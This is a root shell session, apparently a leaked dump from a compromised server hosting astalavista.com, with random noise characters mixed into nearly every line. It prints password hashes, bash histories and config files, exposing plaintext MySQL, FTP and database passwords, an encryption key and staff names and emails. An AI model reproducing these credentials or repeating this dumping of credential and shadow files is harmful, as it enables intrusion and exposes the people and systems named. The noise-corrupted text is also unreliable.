+ q6 @0 W+ I. x2 {[snip]7 n) A3 g: z8 x& M6 Q' _9 [. H
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::5 H+ ]$ [; F, n; F: \
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
2 I2 T+ n+ A4 H, Mcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
0 _# ~" a9 v0 |3 F9 `5 ]# r3 Fastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
- R8 b0 J( \; c/ B" q; o$ @* I( `( v
sh-3.2# cat /etc/motd# Q# c2 T& @; h( v, {& F# ?
##################################################### U( @5 z W3 p
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #, `# J8 i3 e$ S$ I$ b" H8 Y, x' W
# |__| [__ | |__| | |__| | | | [__ | |__| #4 K& C% m* i9 h Z: m d% D; e0 o: _
# | | ___] | | | |___ | | \/ | ___] | | | #
" ]; r0 T! [; J6 Q, V/ C- E, r3 q3 Q# #
j9 k& p4 v8 A#####################################################5 u9 A5 R3 e8 `& Y
# #" Q- G) J* [- f
# Admin Contact - 链接标记support@secureservertech.com #
0 \8 J0 j' }0 w# #" r( Z; N- e1 K6 D, U
# Available ShortCuts #4 B$ ]- D* r4 K) D
# # ] i+ }6 C/ P& m0 D; E! H
# nst - list active connections #- y3 ^% d& L9 I" d2 W
# ddos - shows how many times each ip is connected #* k) r, A$ J1 [, D* }8 S4 ~$ r Q
# ltr - restart the webserver #
' m7 W3 R* ~8 f( ?( B& t# phpc - edit the php config file #1 T1 z1 B' T2 M" e' I1 ?
# htc - edit the webserver configuration file #" O ]& k5 T% i/ J& i9 c
# up - uptime #
1 ~5 ` Y# b: f8 ?9 m# `9 q4 N" \# etd - edit the motd of the day file #, ]/ V5 P, P1 x+ B: R6 V
# htr - start and restart apache if needed #
& d0 ^# g9 p- B) m( p. ]( g4 o# syng - shows active SYN_RECV connections #
5 }3 ~1 H# c0 D: g0 q# f# synd - syn flood blocker - “synd -h” for usage #& n/ O: f1 Q% [% c: Z% e6 R
#####################################################
0 A. }1 p7 f Z9 n# NOTES: #
& Q. `. f/ C; ~9 ]- ?. R1 o# Last Upgrade - 12-08-2008 by JF #5 u7 e/ ?% S& C; ^/ h1 E
# My.cnf/Mysql Optimization - 1-28-09 #
0 J4 y# @) d8 M5 ^* i$ J J4 h# #+ i) V9 l, f/ ]8 O
# # ~+ G; h4 ]% G8 \9 u* G, I
# #
1 C( G7 A9 z: I: P3 j0 F0 E! l! I#####################################################
; \* S% H. M, ] _
( N W! X9 _! _4 z- R8 d/ fsh-3.2# lastlog | grep -v Never
& G) o1 H" L- y$ t; J. ?) v& kUsername Port From Latest" M& o" |) u9 ^3 u2 {! g' R
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
& V( L' N2 @2 H/ Tadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
( }1 t) ]& J9 r$ e7 ?; M3 t3 D& zcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009, {6 Q: B1 w( g: X U1 [
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009$ o) E z; b! _2 S* x# ]( L& H
! {# f! V3 o; S g
sh-3.2# ls -la6 t& s' u$ K( j7 {, `
total 453376
# f9 K4 t2 k- }: W+ W- mdrwxr-x— 15 root root 4096 Jun 4 08:40 ./ x9 ^, ~# j1 _0 Z3 ^4 {% h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 M1 J1 w; I; Y$ M L4 l6 R5 z-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip V/ v# K G4 F* E" H. U9 c
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
% l% A: ?! \0 f' h D-rw——- 1 root root 16836 Jun 4 07:21 .bash_history- Y, `% W, J. I \
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout9 u3 Y! D4 Z/ @+ H0 E% M
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile( y* ]8 K3 ^- U G* H
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc; r* f) M, k0 ?
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
$ B4 L* e: I3 C. s P3 ?( I. o9 `-rw-r–r– 1 root root 1327 Nov 29 2007 cert, Z A) v5 A) a3 Z6 r9 g( x/ S
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
6 ^8 A! y f! g; Tdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
: P5 O7 A2 H* A3 S _2 u% F: w. k-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc+ o# m3 _6 L& I7 R$ [2 R
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql* |# R$ x' N4 p7 {
drwx—— 2 root root 4096 Oct 28 2007 .elinks
7 }; I! J5 }- I+ sdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1; T" t- G) ~7 e2 y5 `/ L1 ^: J
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
% W2 R3 W9 U9 r$ P' |$ N4 b. C-rw——- 1 root root 0 Apr 16 13:19 .history2 z( @; h4 K( ]) d" i
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log3 g& a" t! I6 }6 V5 h6 s% K
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
; M2 b# S: B" V1 W9 ~$ ^3 Q- m! Q-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh7 M; s9 @6 Z: q5 G. a
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
& K/ O2 x `, c% b9 Ydrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp* g# v" V' e( ?$ |
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
- p# A. c+ G4 \) L7 a-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
3 z: E$ Z2 F- {5 \9 B* U- ?-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
5 F, F ?2 q% u; M( y$ t- y-rwx—— 1 root root 760 Sep 18 2008 lp9 s, A% p+ C" L+ x/ G
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
/ Z6 C: s- d9 E1 [; T, b- P6 e8 Q-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz* y; w; {. p5 s
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
, H/ N6 D0 ^* M# Q9 kdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9, Q* x9 v2 d0 ]5 [2 h9 k6 c: a
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
: x9 L7 Z/ p6 j; x9 A; Q& Z) edrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
3 c. I0 ^1 q" E$ q( d1 q) X-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
& I' R7 B2 x o3 b- }5 h( ~) N3 N-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
' F) u: J+ @- V L2 R-rw——- 1 root root 41 Oct 19 2007 .my.cnf" u0 B& S! b, ~" b( R$ }
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
1 R( M6 P9 \( A- C, _4 B-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
5 T1 g% n# f% g/ c2 e. K( \- X9 {-rw——- 1 root root 41 May 20 2008 .mytop
# x4 A, J! w9 tdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.60 V6 M! `/ D( {6 t4 y7 _- u% \7 l
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz' R2 T3 h" m5 E4 k5 x' A
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp0 C* K9 o9 q, }2 X1 }
-rw——- 1 root root 1462 Sep 21 2007 opt.php
. W! Q1 c0 b3 D# D; U-rw-r–r– 1 root root 3371 Sep 22 2007 p; h) \7 l5 ^- T' ?8 Y' J! C1 O
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz28 G0 E; l/ M7 i7 P/ k% u( S
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
' S S5 D0 J0 M: y3 j3 x2 i-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
2 J! L2 F* Q" J-rw-r–r– 1 root root 887 Nov 28 2007 server.key0 H8 M0 l8 T. k
drwx—— 2 root root 4096 Oct 10 2008 .ssh4 x9 R$ C5 |1 j$ x c$ f
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
: [3 F; {1 p' K: K$ y/ g9 T. e-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
1 U% ?, E2 N: y d; B! @5 z5 t-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
3 H7 w0 Z6 `: A9 x: k' [/ `8 L-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
) U+ O& C- i" V& T- O3 X2 Ndrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
0 ~* e% ~, K' T. j$ d t4 ]8 B& [ j-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
' Q; [ m- U9 z' ]. rdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0& l+ D2 D1 m7 p
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz23 k: I' b- k% e3 e4 }5 S( Y
-rw——- 1 root root 12997 May 16 2008 .viminfo
; p6 ^3 |' X% o; Z7 v3 Q- x, o4 {# g: f1 I7 U+ w
sh-3.2# cat .bash_history
6 n& Q; r E! h2 e; u: J5 n[snip]( N8 `) V3 Z2 `2 }3 W0 E: q
wget cp4sst.com/sstlinux.tar.gz
' Y. r. ]6 q# J! ]+ y, S( K+ qtar zxvf sstlinux.tar.gz
. Q4 U# ]$ r4 m2 ccd linux-2.6.27.10* F7 O+ o. U' M, _
sh install.sh1 R- S$ k2 [+ z' N
make bzImage ; make modules ; make modules_install ; make install( z- ~1 S3 z( Y5 p2 [5 z0 _) k4 y
make clean
' C( f( U5 p- I$ R7 l, o3 _service mysqld restart) Q/ |0 P1 Q# ~$ c
[snip]0 I& x# H3 ~) Q8 L4 t
cd /usr/sbin/
0 a% R, A5 `! O1 s8 h I3 k% Ychmod 4777 traceroute0 X! k u! S7 S! U) o1 Z* c' s. {
chmod 4777 ping
& w+ O! ?; V& f$ o- N6 `0 s' xtraceroute -I 链接标记[url]www.astalavista.ch[/url]
; M# g; H! g6 H% p/ q[snip]
9 {7 O! ?3 r! B' {) Yvi /etc/csf/csf.conf; K( |5 D2 _0 T! `3 J: \
traceroute google.ch
) [9 _( H w. U- t& H3 Wservice csf restart
* M* E% z: V+ R5 ~ h( Z- Z5 r8 otracert google.ch
9 b7 Y) {- l$ iservice csf restart
3 t3 X: E" ]4 p, H9 [traceroute 链接标记[url]www.google.ch[/url]1 G/ |3 w; M: Y/ K+ i: I( W2 x: [& T
tracert 链接标记[url]www.google.ch[/url]% V/ n8 `; z, D. e4 }& J' {
traceroute 链接标记[url]www.google.ch[/url]
. m# L* E. t9 u1 i% Ilocate traceroute% t! a) p5 a7 R# m H' G9 m
chown 4755 /bin/traceroute
7 S& s1 |0 z+ cchown 4777 /bin/traceroute
$ ~- D: c2 o$ P' D+ a+ ?* O4 m' `locate ping
- w0 n6 h6 v+ j, `6 w/ ]chown 4755 /bin/ping/ Q6 d" u" x1 v; {6 w% T' U% x
chown 4777 /bin/ping
0 r) t( N2 l7 w& Fcd /bin/) C* J5 ]: J9 U; B% f
ls -ali | grep ping
; E$ r4 f5 C4 J }: c2 zchown root ping& b, f3 q `4 {8 k6 l
chmod 4755 ping
% P( {) M6 c+ @- n/ @ls -ali | grep traceroute
) X# v8 s6 j2 `% I- Jchown root traceroute
5 W5 a/ k- [4 D7 D8 n. O9 f- mchmod 4755 traceroute9 L! O* ]. }' V# L7 P
ls -ali | grep traceroute
% i1 P [) ?# utraceroute -I 链接标记[url]www.google.ch[/url]
& D' q- g. x straceroute 链接标记[url]www.google.ch[/url]
, K" ~! h1 t1 l0 v9 @5 X: y( Nwhois pmsantos.ch
. u2 ^9 _, {, O/ c[snip]
: \+ X& P/ @7 lmysql -h com_contrexx2_live < /root/defaultp_ports.sql/ a9 D& {+ e: h/ Z/ X; N* ~
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
% @, F( L% }/ U* B3 A$ Y: y4 R. t k0 ?mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
, W; @# X- e9 o4 q" \mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql& ?- C5 `1 V9 I! ?" R
top
2 ^9 b6 T7 ?& {ping ssth.ch
/ e! G# G+ N# Z7 k) F7 ^ping asdlkfaljgasd???ljg???lasj.ch8 G1 Y. @" B6 o6 d" ]% u0 r
ping asdlkfaljgasdlasj.ch
/ F- r b3 |$ m) k; ?ping 链接标记[url]www.ssth.ch[/url]
1 P: K$ U' Z* o; r& E" a2 v# ?ping ssth.ch
0 g; I' \0 d* T9 q& j! o nnslookup 链接标记[url]www.google.ch[/url]
2 M) S. y$ `5 y7 o5 l0 Wnslookup 链接标记[url]www.ssth.ch[/url]
, M2 f& @3 S. Hman nslookup
( L; b* X# ~1 [2 Lping 链接标记[url]www.google.ch[/url]
- j6 g P, `7 u3 Dnslookup 链接标记[url]www.google.ch[/url]
% C& `, e+ u nnslookup 链接标记[url]www.google.ch[/url] Y6 D' M! `3 C2 I h
nslookup salfjasdlf.ch# g5 x$ l1 y' U8 {9 I: E
[snip]# \- p, h% m- b5 G" _$ c
openssl passwd -1 sadf
: E. w+ u0 ^- ?. m& gopenssl passwd -1 5cZNHstdTy; t0 x7 k; R( K$ |% i
mysql
& k, ?! V) M" A- I0 t4 qmysql& c8 a {: Q2 M* f2 _4 v- c
locate proftp' s* f: o6 U4 w: U. `; |$ u
vi /etc/proftpd.passwd# T! P7 c- m( U1 [: a$ C0 j# h) B
service proftpd restart b/ c5 |9 R. {: O6 M+ _" g; K& k
locate proftpd.conf
5 S' y# P- ~& Z9 w% `& Qvi /etc/proftpd.conf
# N4 Z' P5 P4 G, L6 W) Mvi /etc/proftpd.passwd% l) N; \2 \6 m
service proftpd restart; r& c7 I# h2 T [. |8 F7 Y
[snip]
8 S9 S( O c/ i8 ~/bin/sh /home/com/backup_system/backup.sh B/ Y# Y5 m8 q7 h+ [. o
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
9 i% {0 v/ S; J- }% \- Mmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
@6 @9 M$ O c) v3 zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql1 ]2 @0 K+ [/ y
ls -ali9 K* @3 `1 J! S% B
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql3 c+ }* j( i7 `
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql8 D. e5 o: Q2 S! r0 O* G5 G
crontab -l/ ?5 }- N! j- [
crontab -l
4 M# W5 [( S, f, l2 ^php -q /home/com/public_html/modifications/cronjobs/securitynews.php" I+ O1 B7 W* t2 R; Q& \
/home/com/public_html/modifications/cronjobs/exploits.sh* z& f! t, l0 ^! |7 u2 f; B& Y
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
4 B! X h3 X# y3 X2 w v; Mtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz4 b' h' m+ \8 e, B7 [
cd lsws-4.0.3
* u2 X" I3 z3 [/ Q- d; c' `sh install.sh
8 @1 k; P+ d* Buptime
) }" \) a1 Z( r4 z! ohdparm -tt /dev/sda
# C2 P8 p1 z7 Q f giostat! N0 J9 r+ P+ {
yum install iostat/ a* x) D4 W% q: b5 ~8 ]( K" p
iostat1 [3 E+ f- r; h/ ~( @! j
whereis iostat
; \/ g* v: p' D3 Syjm clean all) j S( E" E( T1 l
yum clean all ; yum -y update
`$ m; S/ U4 eiostat
) u6 V) ^: n) S5 S# e9 K: L) v) hyum install systat
# Q2 _/ i2 \$ Srpm -qa | grep iostat2 t7 J* Z4 [$ g" F( l$ U' V9 b7 M6 }
rpm -qa | grep sysstat% V) r+ \; ~% @3 Y: d# H7 U
rpm -qa | grep systat
+ V) S/ }0 f) l- |1 {; hdmesg -c9 {: Q( v8 i. E+ V6 [
sysctl -p
5 O7 E9 N# m% U" _. Z2 r% @uname -r8 v: @$ d" m# f1 { Q; p
cd /usr/src P3 n G4 h$ T- K
wget nix101.com/kernels/sstlinux.tar.gz
1 `- P( e# }: n+ Sshutdown -r now7 ?( ]& b0 |+ Q% n% _
nano -w /boot/grub/grub.conf
- ]4 G, U' z( [: W% w; Q F$ l* R& B
( `7 J( _, H+ c5 w' Rsh-3.2# cat .my.cnf9 O+ f3 ~) N" h" G4 ]
[client], v% q F6 M# f+ c5 \- ~. F3 W
user=da_admin
6 ^1 U# q* G8 x) Cpassword=X9dctmRH" |; o, n; N/ e- Y" z5 ^
0 p q" {; t# Q) u/ }7 c8 csh-3.2# cat /home/com/backup_system/backup.sh
9 F+ x1 q! I$ ^/ K9 ]#!/bin/sh
( g- \5 u# @0 M/ _#####################################################################: M$ R! L! C* i) [6 P8 A
# #
2 w4 }! G9 f; A" `6 O `4 Y# incremental backup for astalavista.com #
5 C+ T1 T( s/ f# #. m7 U: x3 X5 n& J- M# O
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
" ^, A1 }2 k# {, A# #
3 w5 C/ P+ D, K0 O#####################################################################- E1 {. ?/ [! A0 A6 w; ?
[snip]3 K' p2 @* E% d
PROG_DIR=”/home/com/backup_system”;! C8 s$ i) r, u
BACKUP_DIR=”/home/com/backups”;
" H$ V- G4 e/ i% l! k- X. ODOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
0 Q4 `8 y; k3 p& w$ H8 S# ftp for synology backup server" t: B4 o! N( [9 v1 r
FTP_HOST=”212.254.194.163″;$ G: ~( T; C8 j+ Q5 ?/ O8 k
FTP_PORT=”21″;8 i/ q' f# ]- f _5 Q& s
FTP_USER=”astalavista.com”;
* @* x: |3 W" q7 Y0 l) cFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;$ y. v/ _6 G+ I
FTP_DIR=”/astalavista.com”;
4 h1 _3 @1 {+ p) f8 y# database g& ` i& R! {- o2 s
DB_HOST=”localhost”;$ q* \5 L( U6 H4 D
DB_USER=”contrexxuser2″;7 u( Z/ K% W" m, a: J8 _& ]8 ]
DB_PASS=”0fEYNZgXz1pKe”;# A' G% N* @- R) J
DB_DATABASE1=”com_contrexx2_live”;
A, e+ M4 u+ t" A& p" KDB_DATABASE2=”com_contrexx2″;* ?+ C; \- ?8 `: V
[snip]
% w N5 j+ e7 eftp -in $FTP_HOST $FTP_PORT <<EOF
) @) m3 @; i A6 `" _quote USER $FTP_USER
& `& e7 I3 K% J- Z0 Cquote PASS $FTP_PASS
4 q1 ~; U) N8 A6 ]& A9 Q, pcd $FTP_DIR
0 R/ H2 N, ` i1 p5 V* Nput $DB_FULLNAME-SQL_Dump.tar w6 U, l5 R" B0 |5 o
put $BACKUP_FULLNAME-Public_HTML.tar4 O1 ]$ r3 G! V! V
close+ a: J- r9 Q3 ]2 F' F: h* X; ~( g
bye
9 ]: y$ K+ [2 p! JEOF
4 s2 Y8 Y+ u. |
; e! j: l1 a! e8 fsh-3.2# cd /home
8 s3 P8 K8 {. Ush-3.2# ls -la y" y7 ^( V3 t& M* w- y
total 120" l& D! [& i) N# X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .7 {$ l' @+ @* ^ l/ p' A' e
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
( _& `6 n: _3 kdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
! R7 V$ i- d9 Q* {-rw——- 1 root root 8192 Jun 4 03:03 aquota.group# t, ?4 ]0 e1 H: K) ~
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
* [7 ~/ d0 A1 k% n( R* \drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet# D& S% [1 }; H* t$ c2 [- X
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
8 @$ b- ?, n4 f! Pdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161; ?* d! s% S% @# j" b
drwx–x–x 10 com com 4096 Apr 28 12:40 com
s) O9 P6 o& \% @, ^! ]( B9 zdrwxr-xr-x 2 root root 4096 May 17 2007 ftp3 H: f( t, a! A5 ]' P' B
drwx—— 3 jon jon 4096 Sep 21 2007 jon
, O. ?" K/ T4 B& C4 [+ rdrwx—— 2 root root 16384 Sep 11 2007 lost+found% Y6 Q: e$ X% C3 a! C S
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 Y$ {; t A H, J, i& Zdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata) k; y5 e5 E& o# F" T
drwx—— 2 jon jon 4096 Sep 15 2007 test
& V! k0 s6 X( ?- m: E5 ndrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; n( k7 ^( |$ R ^4 Z! ^8 \
/ G5 [5 o6 _3 \+ W% k% G9 r* g4 D+ O
sh-3.2# cd admin+ r, c4 D/ X" U8 k' @ M
sh-3.2# ls -la
# w |# d( y7 x: X! S1 @, Z9 D$ |" @total 1735896
7 }4 ?, L. w4 U% Q" _8 c3 pdrwx–x–x 9 admin admin 4096 Nov 28 2007 .6 q) z9 B$ N3 f5 p8 |- z7 e$ E
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 A( C8 g* p3 P- rdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups) c5 f# X' V4 w1 |! ?
drwx—— 2 admin admin 4096 Sep 28 2007 backups
! C/ S# U `* c* _; X* k. G2 d-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
2 g" W& l" X0 B+ C-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout1 t: q# }9 m& P$ v5 C+ ~
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile% z( Q7 x: U3 [5 y
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
' ?: Z/ |1 G3 X1 V( N, J4 g3 Jdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups# j$ {: i1 n; A7 w/ V/ Q; i
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
0 h. l" i8 k0 tdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap; r0 B0 A' J+ [5 H. O3 K' m
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
! `" K; }: v. K1 ?" Xdrwx—— 2 admin admin 4096 Sep 21 2007 mail
& l: b% a c' t. ~-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
$ [/ t( y# v1 X-rw-r–r– 1 root root 887 Nov 28 2007 server.key
6 b0 y, O4 Z: K3 ~/ ~( F-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 I+ ~/ L1 _6 L" Q3 K) \
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
" _* a: S$ d Y- Z$ \8 s1 p1 @$ Y% kdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
1 u) g$ c* Y9 j7 R! \5 v
0 E* t. ?) Y5 Z/ ^6 {sh-3.2# ..# X3 P7 d5 V7 l4 ?: Y
sh-3.2# cd jon- B. n% N) v5 v
sh-3.2# ls -la# n( I* B( O1 G: O. y4 @
total 36
0 m4 g4 s3 H+ l$ p) Edrwx—— 3 jon jon 4096 Sep 21 2007 .2 X9 m4 u1 Y5 O( d" j
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 I$ t6 p0 q" ?' e: G+ t
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history O% C, o. X1 P" `8 [
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout' B9 @/ N! c1 _" u) E
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
5 Y, ?. E6 X8 x-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
) t- G% Z% R# A/ q-rw-r–r– 1 root root 24 Sep 21 2007 info.php' c0 w) x2 \0 z% ^4 C7 j9 J
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html2 {4 z: \; }& X0 l
# I( P% v# n9 m+ \ ]sh-3.2# cd ..
! f- _# k6 r- k0 gsh-3.2# cd test) a# }2 ]- S7 I: C4 `
sh-3.2# ls -la
. @# Q6 P" n1 [% X! s- |" Wtotal 48
M5 ^$ D" L* y0 b- Pdrwx—— 2 jon jon 4096 Sep 15 2007 .' X0 Q! Z/ e4 M& y. C2 x' B% T, A
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 N; ~' ?5 P/ x' T! H( T& V-rw——- 1 jon jon 79 Sep 21 2007 .bash_history! c& d8 }; d. O }
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout x' t- A/ E V3 z& h1 U
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile* K7 R. z j, O: `" A1 |( B
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
l- ?" g& r# P$ H, Fsh-3.2# cat .bash_history
4 y. k5 t/ F6 y% _/usr/bin/mysqladmin -u root password PoliuJhytg67
. l: H4 v, k4 C. ^1 N& E2 ]5 v" @# k4 Y; Z \% B
sh-3.2# cd ..
# ~0 I+ j: o' s. l: n, ?/ [sh-3.2# cd astanet
7 L. s! c9 T+ L. j% S; Ash-3.2# ls -la5 I" E6 Q H; d1 u( T8 I) q
total 52* A9 }2 B$ R& N
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ., c, q1 k; s0 l2 L) f: V% }
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( O1 V& J! d2 B0 n5 D! m/ e
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth" S' V' \# c# k" u
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
) X9 M c$ L2 L; F-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout2 d* f; ~/ k5 P3 F; ~
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile0 u8 E: v& t1 p2 J# Q- F' Z) K
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc% ]; o; E" {, ~
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
+ d' K' }* L/ U$ [' T$ A" udrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap2 F5 G* |$ _& X) C5 Z3 |+ w% z
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail+ R r/ D8 E* s+ t' |
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history; C' h* ^4 H6 g$ g+ F# v6 a& _6 t, _
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 m# B. v( M. I' C4 B+ a- e& i-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
* W/ C" b# t; i4 O# ^% ^7 c3 A# e6 b/ q
sh-3.2# cd auth/# @* h, D. ^: G( J- _
sh-3.2# ls -la
$ X0 [$ B8 T& i: E1 B1 w3 Htotal 28
$ n/ f. g: k8 Hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
( C6 @2 u. h$ H4 ?$ Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
" Y6 r" r9 A, l6 Z9 U9 A2 z" ^-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php$ k ]$ ? t* L9 X5 H, u: Y s
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php) Q( w2 u+ h$ J& ^' X u1 F7 r
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
! `; q" o/ K7 ^7 s; D' H-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting0 g/ m7 p! ~0 q: n" e0 z
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd; W; Z2 H( L, x9 v
) q+ d' ]# e, z; Q7 G6 E0 n
sh-3.2# cat hackercontest.config.inc.php
& g& l! I4 O6 h* O* v. D w9 J# x<?PHP" `% L+ n6 x0 b. y' N
// Variabeln f?r Verbindung zur Datenbank //
* B1 |% `6 d8 l/ c- x+ x$conxHost = ‘localhost’; // MySQL hostname% b, b' K j. {& W/ Q J& ]# k0 e
$conxUser = ‘hackercontest’; // MySQL user5 p; U7 \( A! Y" A7 i6 K0 ]! \
$conxPassword = ‘K6m@7dUc’; // MySQL password
: `1 s* G3 _8 b5 i0 D2 p$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish$ P- M2 A) _+ b: _5 y0 ?1 C o6 d
?>
+ b8 B! h2 u9 |: ?sh-3.2# cat hosting.config.inc.php
& m% I6 S5 I8 {<?PHP$ L- K! _- e. X" l! \- d
// Variabeln f?r Verbindung zur Datenbank //
& f; K$ s$ d, n% C% k$ l1 ]7 y$conxHost = ‘localhost’; // MySQL hostname
